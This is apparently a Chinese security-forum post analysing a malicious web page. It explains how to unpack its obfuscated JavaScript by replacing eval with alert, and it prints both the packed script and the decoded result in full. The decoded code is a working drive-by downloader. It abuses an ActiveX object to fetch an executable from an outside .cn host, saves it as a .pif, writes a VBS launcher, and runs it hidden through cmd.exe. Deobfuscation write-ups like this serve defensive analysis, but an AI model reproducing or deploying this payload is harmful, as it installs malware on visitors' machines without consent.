关于:hxxp://mmmbbcc.cn/1/14.htm解密的日志(全体输出- 2):
Level 0>http://mmmbbcc.cn/1/14.htm
Level 1>http://8877gggg.cn/1.exe ●
先把eval换成alert
- <script>
- alert(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1w="1F";3 k,i,q,6,g;J=\'1C://1x.1y/1.D\';3 F=\'z.1z\';3 y=\'z.15\';3 5=1j["1f"]["17"]("1h");3 v="1i:";3 C="0-1e-0";3 I="1d";3 G="19";3 8="18";3 B="1a-1b-1c";3 E="1A.X"+"M"+"L"+"H"+"T"+"T"+"P";3 K="A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m";3 x="10.";3 w="12";3 N=x+w;3 8=v+8+B+C+I+G;5["16"]("1g",8);3 s$h=5["7"]("1G.1k","");3 9=5["7"](E,"");3 4;4=5.7(K,"");4.Q=1;3 f=s$h.1B(0);3 u;u=5["7"](N,"");R=s$h["1E"](f+\'\\\\1D\',\'11.D\');6=f+"\\\"+F;9.l("1o",J,0);9["1m"]();4["l"]();4["1l"](9["1p"]);4["1q"](6,2);4["U"]();3 1u="5";g=f+"\\\"+y;3 j;j="1r 6 = 7(\"13.";k="10\")"+"\\n";i="6.1s \"11 /c "+6+"\",1t";q=j+k+i;4["Q"]=2;4["l"]();4["1n"]=q;4["1v"](g,2);4["U"]();3 Y="o";3 V="p";3 W="e";3 O="n";3 Z=Y+V+W+O;u.14(R,\' /c \'+g,"",Z,0)',62,105,'|||var|Gameee3|chilam|wwwGameeecn|CreateObject|Gameeeeex|Gameee2||||||VgDnZXHt7|wwwGameeecn2|R6|Gameeezfs|Gameeezf0|Gameeezf|Open|||||Gameeezfx||hHf||sghgdddd|Gameeeee|yings|ying|Gameeenames|Gameeeeee||Gameeeeexx|Gameeeees|exe|Gameeexml|Gameeename|Gameeeeesss||Gameeeeess|Gameee|Gameeeado|||yingx|Gameeessss||type|exp1|||Close|Gameeess|Gameeesss||Gameees|Gameeex|Shell|cmd|Application|Wscript|ShelLExeCute|vbs|setAttribute|createElement|BD96C|FC29E36|556|65A3|11D|0C04|983A|document|classid|object|clsid|window|FileSystemObject|Write|send|WriteText|GET|responseBody|SaveToFile|Set|run|vbhide|Gameeeuser|Savetofile|tnnn|8877gggg|cn|pif|Microsoft|GetSpecialFolder|http|system32|BuildPath|unnn|Scripting'.split('|'),0,{}))
- </script>
复制代码
然后保存为任意.html,在浏览器里执行,就会弹框,不用选定,直接Ctrl+C就可以复制出内容,就可以得到:
-
- tnnn="unnn";var Gameeezf,Gameeezfs,Gameeezfx,wwwGameeecn,wwwGameeecn2;Gameee='http://8877gggg.cn/1.exe';var Gameeename='Gameeeeee.pif';var Gameeenames='Gameeeeee.vbs';var chilam=window["document"]["createElement"]("object");var Gameeeee="clsid:";var Gameeeees="0-983A-0";var Gameeeeess="0C04";var Gameeeeesss="FC29E36";var Gameeeeex="BD96C";var Gameeeeexx="556-65A3-11D";var Gameeexml="Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P";var Gameeeado="A"+"d"+"o"+"d"+"b."+"S"+"t"+"r"+"e"+"a"+"m";var ying="Shell.";var yings="Application";var yingx=ying+yings;var Gameeeeex=Gameeeee+Gameeeeex+Gameeeeexx+Gameeeees+Gameeeeess+Gameeeeesss;chilam["setAttribute"]("classid",Gameeeeex);var hHf$R6=chilam["CreateObject"]("Scripting.FileSystemObject","");var Gameee2=chilam["CreateObject"](Gameeexml,"");var Gameee3;Gameee3=chilam.CreateObject(Gameeeado,"");Gameee3.type=1;var VgDnZXHt7=hHf$R6.GetSpecialFolder(0);var sghgdddd;sghgdddd=chilam["CreateObject"](yingx,"");exp1=hHf$R6["BuildPath"](VgDnZXHt7+'\\system32','cmd.exe');wwwGameeecn=VgDnZXHt7+"\"+Gameeename;Gameee2.Open("GET",Gameee,0);Gameee2["send"]();Gameee3["Open"]();Gameee3["Write"](Gameee2["responseBody"]);Gameee3["SaveToFile"](wwwGameeecn,2);Gameee3["Close"]();var Gameeeuser="chilam";wwwGameeecn2=VgDnZXHt7+"\"+Gameeenames;var Gameeezf0;Gameeezf0="Set wwwGameeecn = CreateObject("Wscript.";Gameeezf="Shell")"+"\n";Gameeezfs="wwwGameeecn.run "cmd /c "+wwwGameeecn+"",vbhide";Gameeezfx=Gameeezf0+Gameeezf+Gameeezfs;Gameee3["type"]=2;Gameee3["Open"]();Gameee3["WriteText"]=Gameeezfx;Gameee3["Savetofile"](wwwGameeecn2,2);Gameee3["Close"]();var Gameees="o";var Gameeess="p";var Gameeesss="e";var Gameeessss="n";var Gameeex=Gameees+Gameeess+Gameeesss+Gameeessss;sghgdddd.ShelLExeCute(exp1,' /c '+wwwGameeecn2,"",Gameeex,0)
复制代码
[ 本帖最后由 aarwwefdds 于 2009-1-1 17:38 编辑 ] |